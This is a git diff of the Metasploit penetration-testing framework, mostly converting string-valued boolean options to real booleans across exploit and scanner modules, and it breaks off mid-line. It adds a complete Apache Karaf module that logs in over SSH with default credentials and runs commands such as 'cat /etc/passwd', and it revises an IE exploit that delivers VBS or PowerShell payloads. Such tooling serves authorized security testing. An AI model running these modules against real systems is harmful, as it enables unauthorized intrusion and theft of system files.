b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb index 2d233bed14..1469af89cc 100644 --- a/modules/auxiliary/scanner/nessus/nessus_rest_login.rb +++ b/modules/auxiliary/scanner/nessus/nessus_rest_login.rb @@ -25,7 +25,6 @@ class MetasploitModule < Msf::Auxiliary 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' } )) register_options( diff --git a/modules/auxiliary/scanner/ntp/ntp_monlist.rb b/modules/auxiliary/scanner/ntp/ntp_monlist.rb index 87d086e4c0..a1cc544140 100644 --- a/modules/auxiliary/scanner/ntp/ntp_monlist.rb +++ b/modules/auxiliary/scanner/ntp/ntp_monlist.rb @@ -37,12 +37,12 @@ class MetasploitModule < Msf::Auxiliary register_options( [ OptInt.new('RETRY', [false, "Number of tries to query the NTP server", 3]), - OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', 'false']) + OptBool.new('SHOW_LIST', [false, 'Show the recent clients list', false]) ], self.class) register_advanced_options( [ - OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', 'false']) + OptBool.new('StoreNTPClients', [true, 'Store NTP clients as host records in the database', false]) ], self.class) end diff --git a/modules/auxiliary/scanner/rdp/ms12_020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb index 8d358d88a2..18edd5f1e8 100644 --- a/modules/auxiliary/scanner/rdp/ms12_020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12_020_check.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) + OptPort.new('RPORT', [ true, 'Remote port running RDP', 3389 ]) ], self.class) end diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index 2985ace425..cb1f1081d1 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -408,7 +408,7 @@ class MetasploitModule < Msf::Auxiliary end subdirs.shift end - print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] == true + print_status("#{ip}:#{rport} - Spider #{x} complete.") unless datastore['ShowFiles'] end unless detailed_tbl.rows.empty? if datastore['LogSpider'] == '1' diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..0aaf08e0bd --- /dev/null +++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb @@ -0,0 +1,133 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 4fa73d6970..4decb2fe61 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] ], - 'DisclosureDate' => 'Jan 09 2016', + 'DisclosureDate' => 'Jan 9 2016', 'License' => MSF_LICENSE )) @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Auxiliary def run_host(ip) ssh_opts = { - port: datastore['RPORT'], + port: rport, auth_methods: ['fortinet-backdoor'] } diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index af26c5f107..21b13ad5ce 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(69), OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']), - OptBool.new('SAVE', [false, 'Save the downloaded file to disk', 'false']) + OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false]) ], self.class) end diff --git a/modules/encoders/x86/opt_sub.rb b/modules/encoders/x86/opt_sub.rb index afab67fbee..e214b9f108 100644 --- a/modules/encoders/x86/opt_sub.rb +++ b/modules/encoders/x86/opt_sub.rb @@ -52,7 +52,7 @@ class MetasploitModule < Msf::Encoder register_options( [ OptString.new( 'ValidCharSet', [ false, "Specify a known set of valid chars (ALPHA, ALPHANUM, FILEPATH)" ]), - OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten" ]) + OptBool.new( 'OverwriteProtect', [ false, "Indicate if the encoded payload requires protection against being overwritten", false]) ], self.class) end @@ -179,10 +179,8 @@ class MetasploitModule < Msf::Encoder raise EncodingError, "Unable to find AND-able chars resulting 0 in the valid character set." end - protect_payload = (datastore['OverwriteProtect'] || "").downcase == "true" - # with everything set up, we can now call the encoding routine - state.decoder_stub = encode_payload(state.buf, reg_offset, protect_payload) + state.decoder_stub = encode_payload(state.buf, reg_offset, datastore['OverwriteProtect']) state.buf = "" state.decoder_stub diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index 9589326a0e..e2080dcb13 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'WfsDelay' => 300, #5 minutes - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'EXITFUNC' => 'thread' }, 'Platform' => ['php'], diff --git a/modules/exploits/linux/http/symantec_web_gateway_restore.rb b/modules/exploits/linux/http/symantec_web_gateway_restore.rb index 67af68d37f..fcac6a43c6 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_restore.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_restore.rb @@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index cf5ac18410..c8d35b9342 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote if res.body =~ /Set Default Options for #{printer_name}/ vprint_good("Added printer successfully") delete_printer(printer_name) - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) vprint_error("Authentication failed") elsif res.code == 426 vprint_error("SSL required - set SSL true") @@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ print_good("Added printer successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") @@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ vprint_good("Added test page to printer queue") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") @@ -159,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ print_status("Deleted printer '#{printer_name}' successfully") - elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) + elsif res.code == 401 || (res.code == 426 && datastore['SSL']) vprint_warning("Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 vprint_warning("Could not delete printer '#{printer_name}' - SSL required - set SSL true.") diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index 99db3c5a68..624e5aa36b 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false + if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target seems safe, so we will not continue.') return end diff --git a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb index 3d4ef14bc7..a540ab99c6 100644 --- a/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb +++ b/modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor', 'Description' => %q{ This module exploits an arbitrary code execution backdoor - placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror. + placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb index 44fee16c47..4143c99639 100644 --- a/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb +++ b/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote ], self.class) register_advanced_options( [ - OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']), + OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]), ], self.class) register_autofilter_ports([ 50013 ]) end diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index 58f15eda96..d799eff564 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote # msf/core/exploit/http/server.rb # def start_http(opts={}) - # Ensture all dependencies are present before initializing HTTP + # Ensure all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] @@ -255,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!") end end diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb index a4c51d6f03..70a7a5713e 100644 --- a/modules/exploits/unix/webapp/php_vbulletin_template.rb +++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb @@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb index dc6584ece0..fedf43dcfc 100644 --- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb +++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb @@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body) if b return b.captures[0] - elsif datastore['HTTP::chunked'] == true + elsif datastore['HTTP::chunked'] b = /chunked Transfer-Encoding forbidden/.match(res.body) if b fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.') diff --git a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb index 80294d38ef..1e47de44e0 100644 --- a/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb +++ b/modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb @@ -110,7 +110,7 @@ print "LFI test for storable flaw is: $frozen\n"; end def exploit - if datastore['DESTRUCTIVE'] == true + if datastore['DESTRUCTIVE'] exploit_destructive else exploit_nondestructive diff --git a/modules/exploits/windows/browser/ie_unsafe_scripting.rb b/modules/exploits/windows/browser/ie_unsafe_scripting.rb index 43c49d7789..3db44238f6 100644 --- a/modules/exploits/windows/browser/ie_unsafe_scripting.rb +++ b/modules/exploits/windows/browser/ie_unsafe_scripting.rb @@ -8,16 +8,26 @@ require 'msf/util/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpServer::HTML + Rank = ManualRanking + + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::EXE include Msf::Exploit::Powershell + VULN_CHECK_JS = %Q| + try { + new ActiveXObject("WScript.Shell"); + new ActiveXObject("Scripting.FileSystemObject"); + is_vuln = true; + } catch(e) {} + | + + def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', - 'Description' => %q{ + 'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration', + 'Description' => %q{ This exploit takes advantage of the "Initialize and script ActiveX controls not marked safe for scripting" setting within Internet Explorer. When this option is set, IE allows access to the WScript.Shell ActiveX control, which allows javascript to @@ -36,43 +46,77 @@ class MetasploitModule < Msf::Exploit::Remote IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from an x64 iexplore.exe. + + By default, this module will not attempt to fire against IEs that come with Protected + Mode enabled by default, because it can trigger a security prompt. However, if you are + feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT + datastore option to true. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'natron', 'Ben Campbell' # PSH and remove ADODB.Stream ], - 'References' => + 'References' => [ [ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://support.microsoft.com/kb/870669'] ], - 'DisclosureDate' => 'Sep 20 2010', - 'Platform' => 'win', - 'Targets' => + 'DisclosureDate' => 'Sep 20 2010', + 'Platform' => 'win', + 'BrowserRequirements' => { + source: 'script', + os_name: OperatingSystems::Match::WINDOWS, + ua_name: HttpClients::IE, + vuln_test: VULN_CHECK_JS, + vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.' + }, + 'Arch' => ARCH_X86, + 'Targets' => [ - [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ] + [ 'Windows x86/x64', {} ] ], - 'DefaultOptions' => + 'DefaultOptions' => { 'HTTP::compression' => 'gzip' }, - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0 + )) register_options( [ - OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]), + OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]), + OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]) ], self.class ) end - def on_request_uri(cli, request) + # Unfortunately we don't currently have an explicit way to check whether Protected Mode is + # actually enabled or not, so we can only rely on whatever is default on the OS. This should + # allow BAP2 to always fire without worrying about the prmopt popping up, but the user can + # still ignore this by setting ALLOWPROMPT to true in standalone mode. + def has_protected_mode_prompt?(browser) + if datastore['ALLOWPROMPT'] + return false + elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name] + return false + end + + true + end + + def on_request_exploit(cli, request, browser) + if has_protected_mode_prompt?(browser) + print_warning("This target possibly has Protected Mode, exploit aborted.") + send_not_found(cli) + return + end # Build out the HTML response page - var_shellobj = rand_text_alpha(rand(5)+5) + var_shellobj = rand_text_alpha(rand(5)+5) p = regenerate_payload(cli) if datastore['TECHNIQUE'] == 'VBS' @@ -92,10 +136,10 @@ class MetasploitModule < Msf::Exploit::Remote end def vbs_technique(var_shellobj, p) - var_fsobj = rand_text_alpha(rand(5)+5) - var_fsobj_file = rand_text_alpha(rand(5)+5) - var_vbsname = rand_text_alpha(rand(5)+5) - var_writedir = rand_text_alpha(rand(5)+5) + var_fsobj = rand_text_alpha(rand(5)+5) + var_fsobj_file = rand_text_alpha(rand(5)+5) + var_vbsname = rand_text_alpha(rand(5)+5) + var_writedir = rand_text_alpha(rand(5)+5) exe = generate_payload_exe({ :code => p.encoded }) vbs = Msf::Util::EXE.to_exe_vbs(exe) @@ -103,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote # Build the javascript that will be served js_content = %Q| -// + | - return js_content + js_content end def psh_technique(var_shellobj, p) cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first)) js_content = %Q| -// + | - return js_content + js_content end end diff --git a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb index cdfeba1163..26459acef3 100644 --- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb +++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb @@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index b9a6736cdb..aafaccaa1b 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 2ff8713b12..865b6b05f8 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote register_evasion_options( [ - OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false']) + OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false]) ]) end @@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote end def generate_space - if datastore['PlaylistSpaceInjection'] == true + if datastore['PlaylistSpaceInjection'] return rand_text(rand(100)+1, nil, " \t") else return '' diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 02656d4b0a..8fe0d02d1d 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -334,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] - if datastore['HTML'] == true + if datastore['HTML'] body = create_email_body_html(datastore['MESSAGE'], msg.subject) content_type = "text/html; charset=\"iso-8859-1\"" msg.add_part(body, content_type, 'quoted-printable') diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 4959c496fb..db56b8840e 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index d008307d25..512ca932fd 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index fa349236e9..7dd33fd5e9 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 144a54e9d9..1049ee46b0 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index e0474ff8d1..96e6b9cb59 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index 463ee9ac5b..3eaa4f66bf 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index a04c30b281..90d48de952 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 1efe2accc1..302377f25f 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index 498f91f7c3..82e78e7f6c 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 666403ab78..ef37f52edf 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote { 'EXITFUNC' => "none", #'InitialAutoRunScript' => 'migrate -f', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index 4e7f05a02a..a3b275d5b2 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'seh', - 'DisablePayloadHandler' => 'true', + 'DisablePayloadHandler' => true, }, 'Payload' => { diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index b8eac69979..c8fc52c28c 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 